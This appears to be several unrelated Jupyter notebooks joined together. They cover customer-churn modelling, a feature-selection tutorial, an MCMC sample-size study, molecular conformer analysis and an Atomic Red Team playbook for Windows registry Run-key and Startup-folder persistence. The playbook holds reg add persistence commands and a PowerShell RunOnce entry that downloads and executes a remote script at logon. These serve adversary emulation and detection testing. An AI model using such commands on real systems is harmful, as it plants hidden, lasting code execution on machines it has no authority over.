| | help| support| 148| M| 2| 91272| Y| 25| Married| null| 27| 0| 13| 0| CC| FreeLocal| Standard| 40| 3| ipho| F| Android Phone| N| 1900|
| | update records| address| 463| M| 0| 69168| Y| 62| Married| null| 14| 6| 215| 0| CC| Budget| Standard| 235| 2| sam| T| Dual SIM| Y| 1586|
|analytical| billing| charges| 471| M| 2| 90104| N| 34| Married| null| 12| 8| 45| 0| CC| Budget| Intnl_discount| 66| 3| sam| F| More Storage| N| 1114|
| satisfied| battery|unpredictability|1238| F| 2| 3194| N| 54| Married| null| 4| 0| 115| 1| CH| Budget| Standard| 119| 3| ipho| F| Large Display| N| 1697|
|frustrated| charger| switch carrier|1342| M| 0| 94928| N| 40| Single| null| 14| 5| 74| 0| CC| FreeLocal| Standard| 94| 1| ipho| T| Dual SIM| Y| 1540|
|analytical| new number| customer care|1591| F| 0| 45613| N| 14| Single| null| 13| 0| 311| 0| CC| Budget| Standard| 324| 4| ipho| F| Android Phone| N| 1681|
|frustrated| call forwarding| features|1645| M| 1| 92648| N| 56| Single| null| 16| 5| 10| 0| CC| Budget| Standard| 32| 4| ipho| T| Android Phone| N| 2291|
|analytical| tablet| new offering|1959| F| 1| 13829| N| 19| Married| null| 42| 0| 160| 0| CC| FreeLocal| Standard| 177| 2| ipho| T| Android Phone| N| 1821|
|analytical| rate plan| customer care|1959| F| 1| 13829| N| 19| Married| null| 42| 0| 160| 0| CC| FreeLocal| Standard| 177| 2| ipho| T| Android Phone| N| 1821|
| | new number| service|2122| M| 2| 49911| Y| 51| Married| null| 27| 0| 24| 0| CC| Budget| Standard| 51| 1| ipho| F| Android Phone| N| 1487|
+----------+-----------------+----------------+----+------+--------+------+------------+---+-------------+-------+------------+-------------+-----+-------+---------+-------------+--------------------+-----+--------+-----------+-----+------------------+----+--------+
only showing top 10 rows
root
|-- SENTIMENT: string (nullable = false)
|-- KEYWORD_COMPONENT: string (nullable = false)
|-- KEYWORD_QUERY: string (nullable = false)
|-- ID: integer (nullable = true)
|-- GENDER: string (nullable = true)
|-- CHILDREN: integer (nullable = true)
|-- INCOME: decimal(10,0) (nullable = true)
|-- CAROWNERSHIP: string (nullable = true)
|-- AGE: integer (nullable = true)
|-- MARITALSTATUS: string (nullable = true)
|-- ZIPCODE: integer (nullable = true)
|-- LONGDISTANCE: decimal(10,0) (nullable = true)
|-- INTERNATIONAL: decimal(10,0) (nullable = true)
|-- LOCAL: decimal(10,0) (nullable = true)
|-- DROPPED: integer (nullable = true)
|-- PAYMETHOD: string (nullable = true)
|-- LOCALBILLTYPE: string (nullable = true)
|-- LONGDISTANCEBILLTYPE: string (nullable = true)
|-- USAGE: decimal(10,0) (nullable = true)
|-- RATEPLAN: integer (nullable = true)
|-- DEVICEOWNED: string (nullable = true)
|-- CHURN: string (nullable = true)
|-- RESPONDED_CAMPAIGN: string (nullable = true)
|-- OMPN: string (nullable = true)
|-- SMSCOUNT: integer (nullable = true)
###Markdown
The following brunel based visualization can also be performed from Data Refinery. Shown here to get the feel for APIs
###Code
%brunel data('pandas_df_callnotes_campaign_churn') bar y(#count) stack polar color(Sentiment) sort(#count) label(Sentiment, ' (', #count, '%)') tooltip(#all) percent(#count) legends(none)
%brunel data('pandas_df_callnotes_campaign_churn') bar x(Sentiment) y(#count) sort(#count) tooltip(#all)
%brunel data('pandas_df_callnotes_campaign_churn') treemap x(Keyword_Component) color(Keyword_Component) size(#count) label(Keyword_Query) tooltip(#all)
###Output
_____no_output_____
###Markdown
The following cell shows an example of how pixiedust can be used to build interactive dashboards, and how it can be exported out
###Code
#display(pandas_df_callnotes_campaign_churn)
display(data_joined_callnotes_churn_campaign)
###Output
_____no_output_____
###Markdown
Building RandomForest based classifier
###Code
si_gender = StringIndexer(inputCol='GENDER', outputCol='GenderIndexed',handleInvalid='error')
si_status = StringIndexer(inputCol='MARITALSTATUS',outputCol='MaritalStatusIndexed',handleInvalid='error')
si_carownership = StringIndexer(inputCol='CAROWNERSHIP',outputCol='CarOwnershipIndexed',handleInvalid='error')
#si_paymentmode = StringIndexer(inputCol='Paymethod',outputCol='PaymethodIndexed',handleInvalid='error')
si_localbill = StringIndexer(inputCol='LOCALBILLTYPE',outputCol='LocalBilltypeIndexed',handleInvalid='error')
si_longdistancebill = StringIndexer(inputCol='LONGDISTANCEBILLTYPE',outputCol='LongDistanceBilltypeIndexed',handleInvalid='error')
si_sentiment = StringIndexer(inputCol='SENTIMENT',outputCol='SentimentIndexed',handleInvalid='error')
si_multiplelines = StringIndexer(inputCol='OMPN',outputCol='OMPNIndexed',handleInvalid='error')
si_churnLabel = StringIndexer(inputCol='CHURN', outputCol='label',handleInvalid='error')
churnLabelIndexer = si_churnLabel.fit(data_joined_callnotes_churn_campaign)
#Apply OneHotEncoder so categorical features aren't given numeric importance
ohe_gender = OneHotEncoder(inputCol="GenderIndexed", outputCol="GenderIndexed"+"classVec")
ohe_maritalstatus = OneHotEncoder(inputCol="MaritalStatusIndexed", outputCol="MaritalStatusIndexed"+"classVec")
ohe_carownership = OneHotEncoder(inputCol="CarOwnershipIndexed", outputCol="CarOwnershipIndexed"+"classVec")
#ohe_paymentmode = OneHotEncoder(inputCol="PaymethodIndexed", outputCol="PaymethodIndexed"+"classVec")
ohe_localbill = OneHotEncoder(inputCol="LocalBilltypeIndexed", outputCol="LocalBilltypeIndexed"+"classVec")
ohe_longdistance = OneHotEncoder(inputCol="LongDistanceBilltypeIndexed", outputCol="LongDistanceBilltypeIndexed"+"classVec")
ohe_sentiment = OneHotEncoder(inputCol='SentimentIndexed', outputCol='SentimentIndexed'+'classVec')
ohe_multiplelines = OneHotEncoder(inputCol='OMPNIndexed', outputCol='OMPNIndexed'+'classVec')
assembler = VectorAssembler(inputCols=["GenderIndexedclassVec", "MaritalStatusIndexedclassVec", "CarOwnershipIndexedclassVec", "LocalBilltypeIndexedclassVec", \
"LongDistanceBilltypeIndexedclassVec","SentimentIndexedclassVec","OMPNIndexedclassVec","CHILDREN", "INCOME", "AGE", \
"LONGDISTANCE", "INTERNATIONAL", "LOCAL", "DROPPED","SMSCOUNT"], outputCol="features")
randomforest_classifier=RandomForestClassifier(labelCol="label", featuresCol="features")
# Convert indexed labels back to original labels.
labelConverter = IndexToString(inputCol="prediction", outputCol="predictedLabel", labels=churnLabelIndexer.labels)
pipeline = Pipeline(stages=[si_gender,si_status,si_carownership,si_localbill,si_longdistancebill,si_sentiment,si_multiplelines,churnLabelIndexer, ohe_gender,ohe_maritalstatus,ohe_carownership,ohe_localbill,ohe_longdistance,ohe_sentiment,ohe_multiplelines, assembler, randomforest_classifier, labelConverter])
###Output
_____no_output_____
###Markdown
Split the dataset into training and test using 70:30 split ratio and build the model
###Code
train, test = data_joined_callnotes_churn_campaign.randomSplit([0.7,0.3], seed=7)
train.cache()
test.cache()
model = pipeline.fit(train)
###Output
_____no_output_____
###Markdown
Testing the test dataset
###Code
results = model.transform(test)
results=results.select(results["ID"],results["CHURN"],results["label"],results["predictedLabel"],results["prediction"],results["probability"])
results.toPandas().head(6)
###Output
_____no_output_____
###Markdown
Model Evaluation
###Code
prefix_precision = 'Precision model1 = {:.2f}.'
print (prefix_precision.format(results.filter(results.label == results.prediction).count() / float(results.count())))
prefix_aoc = 'Area under ROC curve = {:.2f}.'
evaluator = BinaryClassificationEvaluator(rawPredictionCol="prediction", labelCol="label", metricName="areaUnderROC")
print (prefix_aoc.format(evaluator.evaluate(results)))
from repository.mlrepositoryclient import MLRepositoryClient
from repository.mlrepositoryartifact import MLRepositoryArtifact
service_path = 'https://internal-nginx-svc.ibm-private-cloud.svc.cluster.local:12443'
ml_repository_client = MLRepositoryClient()
model_artifact = MLRepositoryArtifact(model, training_data=train, name="Customer Churn Prediction - db2")
# Add author information for model
model_artifact.meta.add("authorName", "Data Scientist");
###Output
_____no_output_____
###Markdown
Save pipeline and model artifacts to Machine Learning repository:
###Code
saved_model = ml_repository_client.models.save(model_artifact)
# Print the saved model properties
print "modelType: " + saved_model.meta.prop("modelType")
print "creationTime: " + str(saved_model.meta.prop("creationTime"))
print "modelVersionHref: " + saved_model.meta.prop("modelVersionHref")
print "label: " + saved_model.meta.prop("label")
###Output
modelType: sparkml-model-2.0
creationTime: 2018-02-19 22:18:53.157000+00:00
modelVersionHref: https://internal-nginx-svc.ibm-private-cloud.svc.cluster.local:12443/v2/artifacts/models/56af74d4-93f4-41bd-8069-850a5117475d/versions/4de851a3-4d05-4957-a27f-6701418e6ce4
label: CHURN
|
20200624 JBL featureSel tutorial.ipynb | ###Markdown
Feature selection with categorical datahttps://machinelearningmastery.com/feature-selection-with-categorical-data/ Prepare data for Ordinal Encoder
###Code
from pandas import read_csv
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OrdinalEncoder
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import mutual_info_classif
from matplotlib import pyplot
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
filename = "breast-cancer.csv"
# load the dataset as a pandas DataFrame
data = read_csv(filename, header=None)
# retrieve numpy array
dataset = data.values
# split into input (X) and output (y) variables
X = dataset[:, :-1]
y = dataset[:,-1]
# format all fields as string
X = X.astype(str)
# load the dataset
def load_dataset(filename):
# load the dataset as a pandas DataFrame
data = read_csv(filename, header=None)
# retrieve numpy array
dataset = data.values
# split into input (X) and output (y) variables
X = dataset[:, :-1]
y = dataset[:,-1]
# format all fields as string
X = X.astype(str)
return X, y
# load the dataset
X, y = load_dataset(filename)
# split into train and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)
# summarise
print('Train', X_train.shape, y_train.shape)
print('Test', X_test.shape, y_test.shape)
# prepare input data
def prepare_inputs(X_train, X_test):
oe = OrdinalEncoder()
oe.fit(X_train)
X_train_enc = oe.transform(X_train)
X_test_enc = oe.transform(X_test)
return X_train_enc, X_test_enc
# prepare target - could be done with OrdinalEncoder, but LabelEncoder is designed for a single variable
def prepare_targets(y_train, y_test):
le = LabelEncoder()
le.fit(y_train)
y_train_enc = le.transform(y_train)
y_test_enc = le.transform(y_test)
return y_train_enc, y_test_enc
# prepare input data
X_train_enc, X_test_enc = prepare_inputs(X_train, X_test)
# prepare output data
y_train_enc, y_test_enc = prepare_targets(y_train,y_test)
# https://stackoverflow.com/questions/12926898/numpy-unique-without-sort
# eyeball input categories
np.unique(X_train)
###Output
_____no_output_____
###Markdown
Chi-Squared Feature Selection
###Code
# custom function for feature selection
def select_features(X_train, y_train, X_test):
fs = SelectKBest(score_func=chi2, k='all')
fs.fit(X_train, y_train)
X_train_fs = fs.transform(X_train)
X_test_fs = fs.transform(X_test)
return X_train_fs, X_test_fs, fs
# feature selection
X_train_fs, X_test_fs, fs=select_features(X_train_enc, y_train_enc, X_test_enc)
# what are scores for the features
for i in range(len(fs.scores_)):
print('Feature %d: %f' % (i, fs.scores_[i]))
# plot the scores
pyplot.bar([i for i in range(len(fs.scores_))], fs.scores_)
pyplot.show()
###Output
_____no_output_____
###Markdown
The bar chart indicates that features 3, 4, 5, and 8 are most relevant.We could set k=4 When configuring the SelectKBest to select these top four features. In a new branch of this Github, update the Ordinal Encoding example to try specifying the order for those variables that have a natural ordering and see if it has an impact on model performance. Build model with all featuresLogistic regression is a good model for testing feature selection methods as it can perform better if irrelevant features are removed from the model.
###Code
# fit the model
model = LogisticRegression(solver='lbfgs')
model.fit(X_train_enc, y_train_enc)
# evaluate the model
yhat = model.predict(X_test_enc)
# evaluate predictions
accuracy = accuracy_score(y_test_enc, yhat)
print('Accuracy: %.2f' % (accuracy*100))
###Output
_____no_output_____ |
playbook/tactics/privilege-escalation/T1547.001.ipynb | ###Markdown
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderAdversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.The following run keys are created by default on Windows systems:* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceThe HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)The following Registry keys can be used to set startup folder items for persistence:* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersThe following Registry keys can control automatic startup of services during boot:* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. Atomic Tests
###Code
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
###Output
_____no_output_____
###Markdown
Atomic Test 1 - Reg Key RunRun Key PersistenceUpon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. **Supported Platforms:** windows Attack Commands: Run with `command_prompt````command_promptREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 1
###Output
_____no_output_____
###Markdown
Atomic Test 2 - Reg Key RunOnceRunOnce Key Persistence.Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. **Supported Platforms:** windows Attack Commands: Run with `command_prompt````command_promptREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 2
###Output
_____no_output_____
###Markdown
Atomic Test 3 - PowerShell Registry RunOnceRunOnce Key Persistence via PowerShellUpon successful execution, a new entry will be added to the runonce item in the registry.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershell$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 3
###Output
_____no_output_____
###Markdown
Atomic Test 4 - Suspicious vbs file run from startup Foldervbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"folder and will also run when the computer is restarted and the user logs in.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershellCopy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 4
###Output
_____no_output_____
###Markdown
Atomic Test 5 - Suspicious jse file run from startup Folderjse files can be placed in and ran from the startup folder to maintain persistance.Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"folder and will also run when the computer is restarted and the user logs in.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershellCopy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 5
###Output
_____no_output_____
###Markdown
Atomic Test 6 - Suspicious bat file run from startup Folderbat files can be placed in and executed from the startup folder to maintain persistance.Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"folder and will also run when the computer is restarted and the user logs in.**Supported Platforms:** windowsElevation Required (e.g. root or admin) Attack Commands: Run with `powershell````powershellCopy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"```
###Code
Invoke-AtomicTest T1547.001 -TestNumbers 6
###Output
_____no_output_____ |
emcee_autocorrelation/emcee_ess_calibration_posterior.ipynb | ###Markdown
ModelThe model on which to perform the simulation will be the estimation of the mean of a Normal variable having observed a 0. We will use:$$ p(\theta) = \mathcal{N}(0, 10)\\p(y|\theta) = \mathcal{N}(\theta, 2)\\p(\theta|y) \sim p(y|\theta)p(\theta) \sim \exp\left(-\frac{(y-\theta)^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right)\\p(\theta|0) \sim \exp\left(-\frac{\theta^2}{8}\right)\exp\left(-\frac{\theta^2}{200}\right) = \exp\left(-\frac{\theta^2}{200/26}\right)$$Therefore, our posterior can be calculated analytically, and it turns out to be $\mathcal{N}(0, \frac{10}{\sqrt{26}})$, whose pdf is:$$ p(\theta|0) = \frac{1}{\sqrt{2\pi}\frac{100}{26}} \exp\left(-\frac{13\theta^2}{100}\right)$$
###Code
sigma2 = 100/26
###Output
_____no_output_____
###Markdown
Utils
###Code
def ess_evolution(samples):
chains, draws = samples.shape
idxs = np.unique(np.geomspace(5, draws, 500, dtype=int))
ess_samples = np.empty(idxs.size)
for i, idx in enumerate(idxs):
ess_samples[i] = az.ess(samples[:, :idx], method="mean")
return idxs, ess_samples
def plot_ess_evolution(samples, idxs, ess_samples, title="", variance=sigma2):
chains, draws = samples.shape
plt.loglog((samples.sum(axis=0).cumsum() / (np.arange(draws)*chains)) ** 2, label="var_err");
plt.loglog(idxs, sigma2/ess_samples, label="var/ess");
plt.legend(loc="lower left");
plt.title(title);
plt.axis(ymin=1e-8);
###Output
_____no_output_____
###Markdown
PyMC3
###Code
with pm.Model() as model:
theta = pm.Normal("theta", mu=0, sigma=10)
y = pm.Normal("y", mu=theta, sigma=2, observed=0)
trace = pm.sample(draws=700000, chains=4, tune=300000)
idata_pymc3 = az.from_pymc3(trace)
idata_pymc3.to_netcdf("pymc3_post_autocorr.nc")
idata_pymc3 = az.from_netcdf("pymc3_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_pymc3.posterior.theta.values)
plot_ess_evolution(idata_pymc3.posterior.theta.values, idxs, ess_samples, title="PyMC3")
###Output
_____no_output_____
###Markdown
PyStan
###Code
stan_code = """
data {
real y;
}
parameters {
real theta;
}
model {
theta ~ normal(0, 10);
y ~ normal(theta, 2);
}
"""
stan_model = pystan.StanModel(model_code=stan_code)
fit = stan_model.sampling(data={"y": 0}, chains=4, iter=10**6, warmup=300000)
idata_pystan = az.from_pystan(fit)
idata_pystan.to_netcdf("pystan_post_autocorr.nc")
idata_pystan = az.from_netcdf("pystan_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_pystan.posterior.theta.values)
plot_ess_evolution(idata_pystan.posterior.theta.values, idxs, ess_samples, title="PyStan")
###Output
_____no_output_____
###Markdown
emcee
###Code
def lnprob(theta):
return -13 * theta**2 / 100
nwalkers = 6
ndim = 1
draws = 701000
pos = np.random.normal(size=(nwalkers, ndim))
sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob)
sampler.run_mcmc(pos, draws, progress=True);
idata_emcee = az.from_emcee(sampler, var_names=["theta"])
idata_emcee.sel(draw=slice(1000, None))
idata_emcee.to_netcdf("emcee_post_autocorr.nc")
idata_emcee = az.from_netcdf("emcee_post_autocorr.nc")
###Output
_____no_output_____
###Markdown
Chain average
###Code
idxs, ess_samples = ess_evolution(idata_emcee.posterior.theta.values)
plot_ess_evolution(idata_emcee.posterior.theta.values, idxs, ess_samples, title="emcee")
###Output
_____no_output_____
###Markdown
Check all samplers got the same posterior
###Code
az.plot_density([idata_emcee, idata_pystan, idata_pymc3])
###Output
_____no_output_____ |
conformers_m13.ipynb | ###Markdown
Exploring conformational space of selected macrocycles - "M13"; Part 1: Generation and selection of conformer candidates (MM methods)
###Code
from IPython.display import HTML
HTML('''<script>
code_show=true;
function code_toggle() {
if (code_show){
$('div.input').hide();
} else {
$('div.input').show();
}
code_show = !code_show
}
$( document ).ready(code_toggle);
</script>
<form action="javascript:code_toggle()"><input type="submit" value="Click here to toggle on/off the raw code."></form>''')
import glob
import py3Dmol
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
%matplotlib inline
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem import Draw
from rdkit.Chem import rdMolAlign
from rdkit.Chem.Draw import IPythonConsole
from rdkit import rdBase
print(rdBase.rdkitVersion)
import os,time
print( time.asctime())
# Functions used in this notebook:
def grep_energies_from_sdf_outputs(files):
energies = {}
for inp in files:
with open(inp,'r') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if "M END" in line:
energies[os.path.splitext(os.path.basename(inp))[0]] = float(lines[i+1])
return energies
def write_to_dict(prefix, suppl):
moldict = {}
for i, mol in enumerate(suppl):
name = prefix + str(i)
moldict[name] = mol
return moldict
def align_structures_to_crystal(moldict):
for key, mol in moldict.items():
core_mol = mol.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
AllChem.AlignMol(mol,m13_crystal,atomMap=list(zip(core_mol,core_m13)))
def align_structures_to_lowest_energy(moldict, energy_dict):
"""
align all structures in "moldict" to the one of the lowest energy
"""
energy_sorted = sorted(energy_dict.items(), key=lambda x: x[1])
first = energy_sorted[0][0]
core_first = moldict[first].GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
for key, mol in moldict.items():
core_mol = mol.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
AllChem.AlignMol(mol,moldict[first],atomMap=list(zip(core_mol,core_first)))
def prepare_view(moldict):
p = py3Dmol.view(width=400,height=400)
for key, mol in moldict.items():
mb = Chem.MolToMolBlock(mol)
p.addModel(mb,'sdf')
p.setStyle({'stick':{'radius':'0.15'}})
p.setBackgroundColor('0xeeeeee')
p.zoomTo()
return p
def make_similarity_matrix(moldict):
similarity_matrix = {}
for k1, m13 in moldict.items():
for k2, m2 in moldict.items():
if (k1, k2) in similarity_matrix.keys() or (k2, k1) in similarity_matrix.keys():
pass
else:
if k1 != k2:
rms = AllChem.GetBestRMS(Chem.RemoveHs(m13),Chem.RemoveHs(m2))
similarity_matrix[(k1, k2)] = rms
return similarity_matrix
def find_duplicates_in_sorted_similarity_matrix(similarity_matrix_sorted, energy):
similarity_thresh = 0.5 # Angstrom
energy_thresh = 5 # kcal/mol
to_be_deleted = []
for pair in similarity_matrix_sorted:
if pair[1] < similarity_thresh:
conf1 = pair[0][0]
conf2 = pair[0][1]
if abs(energy[conf1] - energy[conf2]) < energy_thresh:
#print("conf1, conf2, E(conf1), E(conf2) = ", conf1, conf2, energy_m13_b[conf1], energy_m13_b[conf2])
if energy[conf1] < energy[conf2]:
to_be_deleted.append(conf2)
else:
to_be_deleted.append(conf1)
else:
# similarity_matrix_b_sorted is sorted, so here we would already start looping over
# pairs for which rmsd is > threshold
# and we do not need to do this, so break
break
return to_be_deleted
def find_duplicates(rms_sorted, energy, rms_thresh):
i = 0
to_be_deleted = []
while i < len(rms_sorted):
j = i + 1
while j < len(rms_sorted):
if rms_sorted[i][0] in to_be_deleted:
i = i + 1
j = j + 1
elif rms_sorted[j][0] in to_be_deleted:
j = j + 1
else:
rms1 = rms_sorted[i][1]
rms2 = rms_sorted[j][1]
if (rms2 - rms1) < rms_thresh:
if energy[rms_sorted[i][0]] < energy[rms_sorted[j][0]]:
to_be_deleted.append(rms_sorted[j][0])
else:
to_be_deleted.append(rms_sorted[i][0])
else:
break
i = i + 1
if to_be_deleted:
print("Conformers which will be deleted:")
print(to_be_deleted)
return to_be_deleted
###Output
_____no_output_____
###Markdown
Crystal structure of "m13" macrocycle
###Code
cm13 = open('/home/gosia/work/work_on_gitlab/icho/calcs/m13/m13_crystal.xyz','r').read()
vcm13 = py3Dmol.view(width=400,height=400)
vcm13.removeAllModels()
vcm13.addModel(cm13,'xyz')
vcm13.setStyle({'stick':{'radius':0.15,'color':'spectrum'}})
vcm13.setBackgroundColor('0xeeeeee')
vcm13.zoomTo()
vcm13.show()
# "core" is a part of a molecule, which we wish to be the "most-aligned" among multiple conformers
smiles = 'N1C(=O)c2cc(C(=O)NCCCCCNC(=O)c3cc(C(=O)NCCCCC1)cc(c3)C(C)(C)C)cc(c2)C(C)(C)C'
core_smiles = '[c]1[c][c][c]c([c]1)C([C])([C])[C]'
m13 = Chem.AddHs(Chem.MolFromSmiles(smiles))
core_m13 = m13.GetSubstructMatch(Chem.MolFromSmiles(core_smiles))
templ_m13 = Chem.SDMolSupplier('/home/gosia/work/work_on_gitlab/icho/calcs/m13/m13_crystal.sdf')
m13_crystal = templ_m13[0]
###Output
_____no_output_____
###Markdown
Conformers generated with the Balloon software: Conformers were generated in the Balloon software with the following starting structures:* the crystal geometry (3D), results with prefix: "m13_b_sdf"; the crystal is of the "ss-ss" type;* the SMILES signature of m13 ("0D"), program was allowed to "rebuild the geometry" (option "--rebuildGeometry"), results with prefix: "m13_b_smi"* 3D structures generated in Avogadro (from the crystal geometry and pre-optimized) of the: * "ss_sa" type * "ss_aa" type * "sa_sa" type * "sa_as" type * "sa_aa" type * "aa_aa" type where "ss\_sa" means "(ring1: syn-syn)\_(ring2: syn-anti)" configuration of the amide groups, paired by the neighbouring aromatic ring, etc. In all cases the Balloon software was asked to generate 100 conformers using the genertic algorithm with default settings (only "maxPostprocessIter" increased to 150 and "nGenerations" to 300).The generated conformer structures are presented in a separate notebook: [link](http://nbviewer.jupyter.org/github/gosiao/icho-notebooks/blob/master/conformers_m13_suppl1.ipynb).
###Code
